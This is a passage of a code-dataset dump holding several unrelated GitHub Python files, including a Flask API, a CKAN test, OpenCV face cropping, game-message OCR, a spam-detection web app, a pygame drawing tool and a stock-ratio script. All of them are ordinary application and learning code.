'success': False,\n            'error': 401,\n            'message': 'unauthorized'\n        }), 401\n\n    @app.errorhandler(AuthError)\n    def notAuthenticatedUser(auth_error):\n        return jsonify({\n            \"success\": False,\n            \"error\": auth_error.status_code,\n            \"message\": auth_error.error\n        }), auth_error.status_code\n\n    return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"arhamrashid/FSND-capstone-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"19409568552","text":"import pytest\nfrom mock import patch, MagicMock\nfrom splitgill.indexing.utils import DOC_TYPE\n\nfrom ckanext.versioned_datastore.lib.basic_query.utils import format_facets, get_fields\n\n\nclass TestBasicQueryUtils(object):\n    def test_format_facets(self):\n        # first, check it can deal with an empty aggregation result\n        assert format_facets({}) == {}\n\n        facets = format_facets(\n            {\n                'facet1': {\n                    'sum_other_doc_count': 901,\n                    'doc_count_error_upper_bound': 12,\n                    'buckets': [\n                        {'key': 'value1', 'doc_count': 43},\n                        {'key': 'value2', 'doc_count': 243},\n                        {'key': 'value3', 'doc_count': 543},\n                        {'key': 'value4', 'doc_count': 143},\n                        {'key': 'value5', 'doc_count': 743},\n                    ],\n                },\n                'facet2': {\n                    'sum_other_doc_count': 0,\n                    'doc_count_error_upper_bound': 0,\n                    'buckets': [\n                        {'key': 'value1', 'doc_count': 6},\n                    ],\n                },\n            }\n        )\n\n        assert len(facets) == 2\n        assert facets['facet1']['details']['sum_other_doc_count'] == 901\n        assert facets['facet1']['details']['doc_count_error_upper_bound'] == 12\n        assert len(facets['facet1']['values']) == 5\n        assert facets['facet1']['values']['value1'] == 43\n        assert facets['facet1']['values']['value2'] == 243\n        assert facets['facet1']['values']['value3'] == 543\n        assert facets['facet1']['values']['value4'] == 143\n        assert facets['facet1']['values']['value5'] == 743\n\n        assert facets['facet2']['details']['sum_other_doc_count'] == 0\n        assert facets['facet2']['details']['doc_count_error_upper_bound'] == 0\n        assert len(facets['facet2']['values']) == 1\n        assert facets['facet2']['values']['value1'] == 6\n\n    @pytest.mark.filterwarnings('ignore::sqlalchemy.exc.SADeprecationWarning')\n    @pytest.mark.ckan_config('ckan.plugins', 'versioned_datastore')\n    @pytest.mark.usefixtures('with_versioned_datastore_tables', 'with_plugins')\n    def test_get_fields(self):\n        mock_mapping = {\n            u\"beans-index\": {\n                u\"mappings\": {\n                    DOC_TYPE: {\n                        u\"properties\": {\n                            u\"data\": {\n                                u\"properties\": {\n                                    u\"_id\": {'type': 'long'},\n                                    u\"field1\": {\n                                        u\"type\": u\"keyword\",\n                                    },\n                                    u\"field2\": {\n                                        u\"type\": u\"date\",\n                                    },\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n\n        mapping_mock_function = MagicMock(return_value=mock_mapping)\n        prefix_mock = lambda name: f'beans-{name}'\n        client_mock = MagicMock(indices=MagicMock(get_mapping=mapping_mock_function))\n        search_helper_mock = MagicMock()\n        es_response = [\n            MagicMock(hits=MagicMock(total=4)),\n            MagicMock(hits=MagicMock(total=10)),\n        ]\n        multisearch_mock = MagicMock()\n        multisearch_mock.configure_mock(\n            add=MagicMock(return_value=multisearch_mock),\n            execute=MagicMock(return_value=es_response),\n        )\n        multisearch_class_mock = MagicMock(return_value=multisearch_mock)\n\n        with patch(\n            'ckanext.versioned_datastore.lib.basic_query.utils.prefix_resource',\n            new=prefix_mock,\n        ), patch(\n            'ckanext.versioned_datastore.lib.common.ES_CLIENT', new=client_mock\n        ), patch(\n            'ckanext.versioned_datastore.lib.common.SEARCH_HELPER',\n            
new=search_helper_mock,\n ), patch(\n 'ckanext.versioned_datastore.lib.basic_query.utils.MultiSearch',\n new=multisearch_class_mock,\n ):\n mapping, fields = get_fields('index')\n assert mapping == mock_mapping['beans-index']\n assert len(fields) == 3\n # the first field should always be the _id field and it should always be an integer type\n assert fields[0] == {'id': '_id', 'type': 'integer'}\n assert {'id': 'field1', 'type': 'string'} in fields\n assert {'id': 'field2', 'type': 'string'} in fields\n","repo_name":"NaturalHistoryMuseum/ckanext-versioned-datastore","sub_path":"tests/unit/lib/basic_query/test_basic_query_utils.py","file_name":"test_basic_query_utils.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"97"} +{"seq_id":"5621569966","text":"'''\nmodule opens images on disc and cut them to desired size\nnew photos store on disc with a new name: add char 'p' before orig photo name\n'''\nimport os\nimport timeit\nfrom multiprocessing import Pool\nfrom itertools import repeat\nimport numpy\nimport cv2\n\nfrom . import collage_create\n\n\ndef get_roi(x_c: int, y_c: int, i_w: int, i_h: int, iw_h: int):\n \"\"\"\n find ROI of image\n :param x_c: center X coord of ROI, pixels (int)\n :param y_c: center Y coord of ROI, pixels (int)\n :param i_w: input img width\n :param i_h: input img height\n :param iw_h: half of output img with and height\n :return: tuple(outxc, outyc)\n \"\"\"\n outx_c = x_c\n outy_c = y_c\n\n if x_c + iw_h > i_w:\n outx_c -= iw_h - (i_w - x_c)\n elif x_c - iw_h < 0:\n outx_c += iw_h - (x_c)\n\n if y_c + iw_h > i_h:\n outy_c -= iw_h - (i_h - y_c)\n elif y_c - iw_h < 0:\n outy_c += iw_h - (y_c)\n\n return (outx_c, outy_c)\n\n\ndef detect_face_opencv_haar(face_cascade: cv2.CascadeClassifier, frame: numpy.ndarray,\n i_w: int, in_height=300):\n \"\"\"\n Take haar_cascade and frame (img), search faces in the frame, select face with\n size 'iw'\n :param face_cascade: haarCascade obj\n :param frame: image for face detecting\n :param i_w: out img size\n :param in_height: default height for template img for haarDetector algorithm\n :return: out img (cut to iw)\n \"\"\"\n\n iw_h = i_w >> 1 # half of img width\n\n frame_open_cv_haar = frame.copy()\n frame_height = frame_open_cv_haar.shape[0]\n frame_width = frame_open_cv_haar.shape[1]\n\n in_width = int((frame_width / frame_height) * in_height)\n\n frame_open_cv_haar_small = cv2.resize(frame_open_cv_haar, (in_width, in_height))\n\n faces = face_cascade.detectMultiScale(cv2.cvtColor(frame_open_cv_haar_small,\n cv2.COLOR_BGR2GRAY))\n\n # choose the first face, find center of rect\n if not list(faces): # if no face detected select the middle of the picture\n roi = get_roi(int(frame_width / 2), int(frame_height / 2), frame_width, frame_height, iw_h)\n out_small_image = frame_open_cv_haar[roi[1] - iw_h:roi[1] + iw_h - 1,\n roi[0] - iw_h:roi[0] + iw_h - 1].copy()\n else: # faces are detected, select one of them\n x_center = int((faces[0][0] + faces[0][2] / 2) * (frame_width / in_width))\n y_center = int((faces[0][1] + faces[0][3] / 2) * (frame_height / in_height))\n roi = get_roi(x_center, y_center, frame_width, frame_height, iw_h)\n out_small_image = frame_open_cv_haar[roi[1] - iw_h:roi[1] + iw_h - 1,\n roi[0] - iw_h:roi[0] + iw_h - 1].copy()\n\n # logger.debug(VisualRecord(\"Haar face detector \" + str(datetime.datetime.utcnow()),\n # [frame_open_cv_haar, out_small_image], \"bla bla\", fmt=\"png\"))\n\n return out_small_image\n\n\ndef 
resize_image_haar(cascade: cv2.CascadeClassifier, src_image: numpy.ndarray, p_w: int):\n \"\"\"doc\"\"\"\n out_small_image = detect_face_opencv_haar(cascade, src_image, p_w)\n return out_small_image\n\n\ndef open_im_resize_and_save(path_list: list, i_w: int):\n '''\n Imgs processing: open imgs with path in path_list, resize and save on disk\n :param path_list: string list with path imgs\n :param i_w: out image width\n :return: nothing. Result photos save on disk\n '''\n face_cascade = cv2.CascadeClassifier(\"haar\\\\haarcascade_frontalface_default.xml\")\n for path_f in path_list:\n src_im = cv2.imread(path_f)\n temp_img = numpy.zeros((i_w - 1, i_w - 1, 3), numpy.uint8) # empty image\n temp_img[:, :, 2] = 255 # red color temlate with size 256x256 pixels\n\n # for real photo apply haar face detector and resize photo by faces\n if not src_im.shape[0] == src_im.shape[1] & src_im.shape[0] == i_w - 1:\n temp_img = resize_image_haar(face_cascade, src_im, i_w)\n\n # save result photo\n c_dir, file = path_f.split('\\\\')\n cv2.imwrite(c_dir + \"\\\\\" + \"p\" + file, temp_img)\n\n print(\"List of \" + str(len(path_list)) + \" images saved. \" + \" PID = \" + str(os.getpid()))\n\n\ndef generate_list_of_paths(template_start, template_end, number_of_imgs):\n \"\"\"doc\"\"\"\n out_list = []\n for i in range(number_of_imgs):\n out_list.append(template_start + str(i) + template_end)\n return out_list\n\n\ndef main(num_i: int, i_w: int, collage_cols: int):\n \"\"\"\n Open photo in \"photo\" folder of proj dir.\n Compute and form lists of images for parallel image processing.\n Detect faces in the each image and cut them with size IM_WIDTH x IM_WIDTH\n Save small images with a new name in 'photo' dir.\n\n Sequence of funcs calls:\n - main() calls generate_list_of_paths() - create list with photo paths\n - main() calls openim_resize_and_save() in parallel mode;\n - openim_resize_and_save() processes each photo in list: open, resize and save\n - in the loop by list elements openim_resize_and_save() calls a\n resize_image_haar() that resize imgs\n - resize_image_haar() calls face detector detectFaceOpenCVHaar() that return\n cut photo with final size\n - detectFaceOpenCVHaar() calls get_roi() for checking and changing roi\n - get_roi() returns result roi for detectFaceOpenCVHaar()\n - detectFaceOpenCVHaar()returns result photo for resize_image_haar()\n - resize_image_haar() returns photo to openim_resize_and_save()\n - openim_resize_and_save() saves result photo on disk\n - main() calls collage_create module and finishes itself\n \"\"\"\n print(\"\\nStart detecting faces and resize images in parallel mode\")\n\n # of CPUs\n cpus = os.cpu_count()\n # generate a list of images paths\n pathes = generate_list_of_paths(\"photo\\\\i0000\", \".jpg\", num_i)\n\n photos_by_process = int(num_i / cpus)\n delim = num_i % cpus # idx starts from 0 but photo from 1 => d decremented by 1\n\n splitted_list = []\n\n for i in range(cpus):\n splitted_list.append(i)\n splitted_list[i] = []\n for j in range(photos_by_process):\n splitted_list[i].append(pathes[j + photos_by_process * i])\n\n # to last list add the last d paths\n for k in range(delim):\n splitted_list[i].append(pathes[k + photos_by_process * cpus])\n\n # form list from lists\n final_list = [i for i in splitted_list]\n #final_list.append(i) for i in range(len(splitted_list))\n #final_list.append(splitted_list[i])\n t_0 = timeit.time.time()\n\n # openim_resize_and_save(final_list[3])\n # START parallel execution of functions\n #open_im_resize_and_save(final_list[0], 
i_w)\n\n    with Pool(processes=cpus) as pool:\n        pool.starmap(open_im_resize_and_save, zip(final_list, repeat(i_w)))\n\n    t_1 = timeit.time.time()\n    print(\"execution time: {:.3f}\".format(t_1 - t_0) + \"s. (Only detecting faces and resize)\")\n\n    collage_create.main(num_i, i_w, collage_cols)\n\nif __name__ == \"__main__\":\n    # PERFORMANCE ESTIMATION\n    # ~6 s per cycle of saving 50 photos\n    # 1 way. print(timeit.timeit(\"openim_resize_and_save()\", setup=\"from __main__ import\n    # openim_resize_and_save\", number = 2))\n    # 2 way. extime = float(timeit.Timer(openim_resize_and_save).timeit(number=3))/3\n    # print(extime)\n    main(10, 128, 5)\n","repo_name":"Nenu1985/Collage","sub_path":"collage/resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"43286885453","text":"import csv\nfrom functools import lru_cache\nfrom operator import itemgetter\nimport string\nfrom typing import Optional\n\nimport pytesseract\nfrom PIL import Image, ImageGrab\n\nfrom src.globals import DO_STRETCH\n\n\nREPLACEMENT_WORD_CACHE = {}\n\n\nclass Message:\n    def __init__(self, text: Optional[str] = None):\n        self.ocred = not text\n        self._text = text\n        self._corrected_text: Optional[str] = None\n        self._image: Optional[Image.Image] = None\n        self._data: Optional[dict] = None\n        self._raw_words: Optional[list[str]] = None\n        self._raw_scores: Optional[list[float]] = None\n        self._corrected_words: Optional[list[str]] = None\n        self._words: Optional[tuple[str]] = None\n        self._receiver: Optional[str] = None\n        self._sender: Optional[str] = None\n        self._body: Optional[list[str]] = None\n\n    @property\n    def image(self) -> Image:\n        if not self.ocred:\n            raise ValueError(\"Cannot get image of unocred message\")\n        if not self._image:\n            # a bounding box (bbox) is a 4-tuple defining the left, upper, right, and lower pixel coordinate.\n            # At 1920x1200, the box would be (8, 981, 571, 1136) if not stretched\n            # At 1920x1200 stretched, the box would at approximately (9, 1080, 634, 1195)\n            # if the ratio is not 16:9, we need to stretch our crop box.\n            full_screen = ImageGrab.grab(include_layered_windows=True)\n            bbox = (78, 981, 571, 1136)\n            if DO_STRETCH:\n                bbox = (79, 1080, 634, 1195)\n            # scale for width and height of the full_screen\n            bbox = (\n                int(bbox[0] * full_screen.width / 1920),\n                int(bbox[1] * full_screen.height / 1200),\n                int(bbox[2] * full_screen.width / 1920),\n                int(bbox[3] * full_screen.height / 1200),\n            )\n            self._image = ImageGrab.grab(bbox=bbox, include_layered_windows=True)\n            # convert to greyscale\n            self._image = self._image.convert(\"L\")\n        return self._image\n\n    @property\n    def text(self) -> str:\n        if not self._text:\n            assert self.ocred\n            self._text = pytesseract.image_to_string(self.image)\n        return self._text\n\n    @property\n    def data(self) -> dict:\n        if not self.ocred:\n            raise ValueError(\"Cannot get data of unocred message\")\n        if not self._data:\n            tsv_data = pytesseract.image_to_data(self.image)\n            tsv_reader = csv.reader(tsv_data.splitlines(), delimiter=\"\\t\")\n            headers = [x.lower() for x in next(tsv_reader)]\n            assert headers == [\n                \"level\",\n                \"page_num\",\n                \"block_num\",\n                \"par_num\",\n                \"line_num\",\n                \"word_num\",\n                \"left\",\n                \"top\",\n                \"width\",\n                \"height\",\n                \"conf\",\n                \"text\",\n            ]\n            self._data = [dict(zip(headers, row)) for row in tsv_reader]\n        return self._data\n\n    @property\n    def raw_words(self) -> list[str]:\n        if not self._raw_words:\n            if self.ocred:\n                # todo: 
deal with low confidence words\n raw = list(filter(itemgetter(0), [(x[\"text\"].strip(), x[\"conf\"]) for x in self.data if x[\"text\"]]))\n self._raw_words = [x[0] for x in raw]\n self._raw_scores = [x[1] for x in raw]\n # remove low confidence words\n # for index, (score, word) in reversed(list(enumerate(zip(self._raw_scores, self._raw_words)))):\n # if float(score) < 50:\n # del self._raw_words[index]\n # del self._raw_scores[index]\n\n else:\n self._raw_words = list(filter(None, [x.strip() for x in self.text.split()]))\n assert all(self._raw_words)\n return self._raw_words\n\n @lru_cache\n def valid_word(self, word: str, allow_mixed=False) -> bool:\n indicators = word and (\n all(c in string.ascii_uppercase + \"-\" for c in word)\n or all(c in string.digits for c in word)\n or word.startswith(\"=\")\n or word.endswith(\"=\")\n or (allow_mixed and all(c in (string.ascii_uppercase + \"-\" + string.digits) for c in word))\n )\n contra_indicators = not word or word.startswith(\"-\") or word.endswith(\"-\")\n return not contra_indicators and indicators\n\n @property\n def corrected_words(self) -> list[str]:\n if not self._corrected_words:\n # pytesseract seems to figure out 0 and Os using context clues.\n # The \"1\"s and \"I\"s in highfleet's font confuse it. we need to replace 1 with I in words that are mostly characters and I with 1 in words that are mostly numbers\n self._corrected_words = []\n new_replacement_words = {}\n for word in self.raw_words:\n if word in REPLACEMENT_WORD_CACHE:\n if REPLACEMENT_WORD_CACHE[word] is None:\n self._corrected_words.append(\"\")\n continue\n self._corrected_words.append(REPLACEMENT_WORD_CACHE[word])\n continue\n elif word in new_replacement_words:\n if new_replacement_words[word] is None:\n self._corrected_words.append(\"\")\n continue\n self._corrected_words.append(new_replacement_words[word])\n continue\n elif self.valid_word(word):\n self._corrected_words.append(word)\n new_replacement_words[word] = word\n continue\n elif \"I\" in word:\n # if the non I characters are mostly numbers, replace I with 1\n number_count = sum(c.isdigit() for c in word.replace(\"I\", \"\"))\n if number_count > len(word) / 2:\n replaced = word.replace(\"I\", \"1\")\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n if \"1\" in word:\n # if the non 1 characters are mostly letters, replace 1 with I\n letter_count = sum(c.isalpha() for c in word.replace(\"1\", \"\"))\n if letter_count > len(word) / 2:\n replaced = word.replace(\"1\", \"I\")\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n # pound sings are sometimes 1s\n if \"£\" in word:\n replaced = word.replace(\"£\", \"1\")\n if self.valid_word(replaced):\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n # fallthrough, the user can deal with this later\n self._corrected_words.append(word)\n for index, (new_word, old_word) in enumerate(zip(self._corrected_words, self._raw_words)):\n if new_word != old_word:\n self.update_text_by_index(self._text, self.raw_words, index, new_word)\n REPLACEMENT_WORD_CACHE.update(new_replacement_words)\n return self._corrected_words\n\n @staticmethod\n def update_text_by_index(text: str, words: list[str], new_word_index: int, new_word: str) -> str:\n # if new_word is duplicated in the list, we need to figure out which one we're replacing\n duplicate_indices = [index for index, word in enumerate(words) if word == new_word]\n # we are assuming the words list 
is in order of appearance in the text, at least for duplicates\n if len(duplicate_indices) > 1:\n # replace the duplicates with unique markers that are unlikely to be in the text\n for index in duplicate_indices:\n text = text.replace(words[index], f\"**{index}**\", 1)\n # replace the one we want\n text = text.replace(f\"**{new_word_index}**\", new_word, 1)\n # replace the rest of the duplicates\n for index in duplicate_indices:\n if index != new_word_index:\n text = text.replace(f\"**{index}**\", words[index], 1)\n else:\n text = text.replace(words[new_word_index], new_word, 1)\n return text\n\n @property\n def corrected_text(self) -> str:\n if not self._corrected_text:\n # _corrected_text is updated via update_corrected_word\n self._corrected_text = self._text\n return self._corrected_text\n\n def clear_words_after_corrected_words(self):\n self._words = None\n self._body = None\n self._receiver = None\n self._sender = None\n\n def update_corrected_word(self, index: int, new_word: str):\n self._corrected_text = self.update_text_by_index(self.corrected_text, self.corrected_words, index, new_word)\n self._corrected_words[index] = new_word\n self.clear_words_after_corrected_words()\n\n @property\n def words(self) -> tuple[str]:\n if not self._words:\n self._words = tuple(filter(None, [x for x in self.corrected_words if x]))\n assert all(self._words)\n return self._words\n\n @property\n def sender(self) -> Optional[str]:\n # the sender is the last word, prepended with a equals sign\n # the sender can be missing\n # return sans equals sign\n if not self._sender:\n self._sender = (\n self.words[-1].lstrip(\"=\") if self.words and self.words[-1].startswith(\"=\") else None\n ) or None\n return self._sender\n\n @property\n def receiver(self) -> Optional[str]:\n # the receiver is the first word appended with a equals sign\n # the receiver can be missing\n # return sans equals sign\n if not self._receiver:\n self._receiver = (self.words[0].rstrip(\"=\") if self.words and self.words[0].endswith(\"=\") else None) or None\n return self._receiver\n\n @property\n def body(self) -> list[str]:\n # the body is everything in between the sender and receiver\n if not self._body:\n self._body = self.words[1 if self.receiver else 0 : -1 if self.sender else None]\n return self._body\n\n def handle_replacement_word(self, word: str) -> str:\n replacement = None\n while True: # no do while in python\n print(f\"Please enter replacement for {word} or blank to skip\")\n replacement = input()\n replacement = replacement.strip().upper()\n if replacement == \"\":\n # leave loop with no replacement\n break\n if self.valid_word(replacement, allow_mixed=True):\n # leave loop with replacement\n break\n return replacement\n\n def get_word_translations(self, translation_table: dict[int, str]) -> str:\n # get all the words in order, translate them and update the text to return\n cipher_words = [self.receiver] + list(self.body) + [self.sender]\n clear_words = [str.translate(word, translation_table) for word in cipher_words]\n return dict(zip(cipher_words, clear_words))\n\n def get_clear_text(self, translation_table: dict[int, str]) -> str:\n cipher_words_to_clear_words = self.get_word_translations(translation_table)\n clear_text = self.corrected_text\n for key, value in cipher_words_to_clear_words.items():\n clear_text = clear_text.replace(key, value, 1)\n return 
clear_text\n","repo_name":"jhillacre/highfleet-decoder","sub_path":"src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"97"} +{"seq_id":"34720634250","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport xlrd\n\ndf=pd.read_excel(\"D:\\Pics\\抖音采集工具x64\\视频列表0301-1734.xlsx\")\ndf.head(10)\n# fig=plt.figure()\n#\n# ax=fig.add_subpolt(1,1,1)\n\ndata=xlrd.open_workbook(filename=r\"D:\\Pics\\抖音采集工具x64\\视频列表0301-1734.xlsx\")\n# table=data.sheets()[8]\ntable=data.sheet_by_name('作者作品')\nnames=data.sheet_names()\nprint(names)\nprint(table)\nprint(\"xlsx行数:\",table.nrows)\n# print(data.sheet_loaded('61'))\n# print(table.row_len(2))\n# print(table.row(3))\n# print(table.row_types(3,start_colx=0,end_colx=None))\n# print(table.row_values(3,start_colx=0,end_colx=None))\n\n# print(table.ncols)\n# print(table.col(1,start_rowx=0,end_rowx=15))\n# print(table.col_values(1,start_rowx=0,end_rowx=15))\n# print(table.col_types(1,start_rowx=0,end_rowx=15))\n\n# print(table.cell(1,6))\n# print(table.cell_value(1,6))\n# print(table.col_types(1,6))\n# ax.hist(df['点赞数'],bins=7)\n# # labels and Tit\n# plt.title('大小比较')\n# plt.xlabel('time')\n# plt.ylabel('点赞数')\n# plt.show()","repo_name":"yinqinghe/spider-crawler","sub_path":"课外学习/微博图片/数据可视化/数据读入.py","file_name":"数据读入.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"14924561061","text":"from flask import Flask, render_template, request\n\nfrom src.spamDetection.pipelines.predict_pipeline import CustomData, PredictPipeline\nfrom src.spamDetection.logger import logging\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef predict_datapoint():\n if request.method == 'GET':\n return render_template('home.html')\n\n else:\n data = CustomData(text_input=request.form.get('email-text'))\n\n print(\"Creating custom Data as DataFrame\")\n data_df = data.get_data_as_dataframe()\n print(\"Generating predictions...\")\n predict_pipeline = PredictPipeline()\n preds = predict_pipeline.predict(data_df).numpy()\n class_dict = {0: \"Not Spam\", 1: \"Spam\"}\n return render_template('home.html', results=class_dict[int(round(preds[0][0]))])\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"amulyaprasanth/email_spam_detection_CVIP_Data_Science_Intern","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"11386108241","text":"musterAdi='Mehmet'\nmusterSoyad='Dizman'\nmusteriAdSoyad= musterAdi + ' ' + musterSoyad\nmusteriCinsiyet=True #Erkek\nmusteriTcNo='12345678900'\nmusteriDogumYili=2000\nmusteriAdres='Konya'\nmusteriYasi=2022-musteriDogumYili\n\norder1=110\norder2=2222\norder3=546\ntotal=order1+order2+order3\nprint(total)","repo_name":"mdizman/PythonCourse","sub_path":"Objeler ve Veri Yapıları/1-DegiskenTanimlama.py","file_name":"1-DegiskenTanimlama.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"71738072319","text":"import pygame\nimport os\nfrom PIL import ImageGrab # Use for Windows\n#import pyscreenshot as ImageGrab # Use for Linux\nimport datetime\nimport os\n\npygame.init()\n\n\nx = 100\ny = 100\nSCREENWIDTH = 300\nSCREENHEIGHT = 
300\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (x,y)\n\n#capture_window = (x+5,y+25,x+SCREENWIDTH+5,y+SCREENHEIGHT+25) Use for Linux\ncapture_window = (x,y,x+SCREENWIDTH,y+SCREENHEIGHT) # use for Windows\n\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nLIME = (0,255,0)\nBLUE = (0,0,255)\n\ndef get_filename():\n    now = str(datetime.datetime.now())\n    now = now.replace(\" \",\"\")\n    now = now.replace(\":\",\"\")\n    now = now.replace(\"-\",\"\")\n    now = now.replace(\".\",\"\")\n    now+=\".png\"\n    return now\n\nget_filename()\n\nclass Brush(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.Surface((30,30))\n\t\tself.image.fill(LIME)\n\t\tself.image.set_colorkey(LIME)\n\t\tself.rect = self.image.get_rect()\n\t\tself.can_draw = False\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.color = BLACK\n\n\tdef update(self):\n\t\tif not self.can_draw:\n\t\t\tpygame.mouse.set_visible(True)\n\n\t\tif (self.can_draw):\n\t\t\tpygame.mouse.set_visible(False)\n\t\t\tpygame.draw.circle(self.image,self.color,(self.rect.centerx,self.rect.centery),15)\n\t\t\tself.rect.x,self.rect.y = pygame.mouse.get_pos()\n\n\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT+35))\nscreen.fill(WHITE)\ninstruction_font = pygame.font.Font('freesansbold.ttf', 15)\n\nbrush_group = pygame.sprite.Group()\n\nbrush = Brush()\n\nbrush_group.add(brush)\n\nrunning = True\n\nwhile running:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trunning = False\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tbrush.can_draw = True\n\t\tif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tbrush.can_draw = False\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_r:\n\t\t\t\tbrush.rect.x,brush.rect.y = -50,0\n\t\t\t\tscreen.fill(WHITE)\n\t\t\tif event.key == pygame.K_s:\n\t\t\t\timage = ImageGrab.grab(capture_window)\n\t\t\t\timage.save(os.path.join(\"\",get_filename()))\n\t\t\t\tbrush.rect.x,brush.rect.y = -50,0\n\t\t\t\tscreen.fill(WHITE)\n\tbrush_group.draw(screen)\n\tbrush_group.update()\n\tpygame.draw.rect(screen,(BLACK),(0,SCREENHEIGHT,300,35))\n\tinstruction = instruction_font.render(\"Press [S] to save and [R] to refresh\", True, (0,255,0), (0,0,0))\n\tscreen.blit(instruction,(20,SCREENHEIGHT+10))\n\tpygame.display.flip()\nquit()\n\n","repo_name":"leslie-asava/Hand-Written-Digit-Recognition","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"20641273736","text":"mydic={'name':'小明','age':18,'sex':'男'}\n# get the value of 'name'\nname=mydic['name']\n# add a new key-value pair\nmydic['mail']='xiaoming@163.com'\n# change a value\nmydic['name']='小华'\n# delete a value\ndel mydic['mail']\nprint(mydic)\n# iterate over all key-value pairs\nfor k,v in mydic.items():\n    print('k:'+str(k)+'\\t v:'+str(v))\n# iterate over all keys\nfor k in mydic.keys():\n    print(k)\n# iterating over a dict defaults to its keys, so this is equivalent to the statement above\nfor k in mydic:\n    print(k)\n# iterate in sorted order\nfor k in sorted(mydic):\n    print(k)\n# iterate over all values\nfor v in mydic.values():\n    print(v)\n# deduplicate with set()\ndic={'name1':'小明','name2':'小明','name3':'小华'}\nprint(set(dic.values()))\nfor v in set(dic.values()):\n    print(v)\n\n# list of dictionaries\ndic1={'name':'小明','age':18,'sex':'男'}\ndic2={'name':'小芳','age':15,'sex':'女'}\ndic3={'name':'小米','age':25,'sex':'男'}\ndiclist=[dic1,dic2,dic3]\nprint(diclist)\nfor dic in diclist:\n    print(dic)\n\n# storing a list in a dictionary\ndic= {\n    'name':'编程语言',\n    'type':['python','c#','java']\n    }\nfor t in dic['type']:\n    print(t)\n\n# storing a dictionary in a dictionary\nmydic={\n    'student':{\n        'stuname':'小明','stuage':18\n    },\n    
'class':{\n 'classname':'一班','teacher':'陈老师'\n }\n }\nfor k,v in mydic.items():\n for lk ,lv in v.items():\n print(lk+'\\t'+str(lv))\n ","repo_name":"AngYony/ay-treasure-tool","sub_path":"python/book-src/crmdsj/Dictionary/dictionary_sample.py","file_name":"dictionary_sample.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"7660458236","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 8 03:58:30 2023\r\n\r\n@author: woa8uh\r\n\"\"\"\r\n\r\nfrom yahooquery import Ticker\r\nimport pandas as pd\r\nimport datetime\r\nimport glob\r\nimport os.path\r\n\r\nstocks_file_type = 'equity_active_data_*'\r\nstocks_files = glob.glob(stocks_file_type)\r\nstocks_max_file = max(stocks_files, key=os.path.getctime)\r\ndf_all_bse_stocks = pd.read_csv(stocks_max_file)\r\nstock_tickers = df_all_bse_stocks['scrip_id'] + \".BO\"\r\n\r\n# Create a new DataFrame to store the calculated ratios\r\nratios_df = pd.DataFrame(columns=[\r\n \"Symbol\", \"Current Ratio\", \"Quick Ratio\", \"Gross Profit Margin\", \"Operating Profit Margin\",\r\n \"Net Profit Margin\", \"Inventory Turnover\", \"Receivables Turnover\", \"Debt to Equity Ratio\",\r\n \"Debt Ratio\", \"Interest Coverage Ratio\", \"Return on Assets\", \"Return on Equity\",\r\n \"Return on Investments\", \"Earnings per Share\", \"Revenue Growth Rate\",\r\n \"Earnings Growth Rate\", \"P/E Ratio\", \"Dividend Yield\"\r\n])\r\nfor symbol in stock_tickers:\r\n print(symbol)\r\n stock = Ticker(symbol, country = 'India')\r\n \r\n #Perform quaterly financial fundamental analysis\r\n quaterly = stock.all_financial_data(frequency=\"q\")\r\n if('data unavailable' not in quaterly):\r\n quaters = quaterly[quaterly['TotalAssets'].notna()]\r\n recent_quater = quaters.iloc[-1] \r\n \r\n #Liquidity Ratios\r\n try:\r\n current_assets = recent_quater['CurrentAssets']\r\n except:\r\n current_assets = None\r\n try: \r\n current_liabilities = recent_quater['CurrentLiabilities']\r\n except:\r\n current_liabilities = None\r\n try: \r\n inventory = recent_quater['Inventory']\r\n except:\r\n inventory = None\r\n \r\n try: \r\n current_ratio = current_assets / current_liabilities\r\n except:\r\n current_ratio = None\r\n try: \r\n quick_ratio = (current_assets - inventory) / current_liabilities \r\n except:\r\n quick_ratio = None\r\n \r\n #Profitability Ratios\r\n try: \r\n 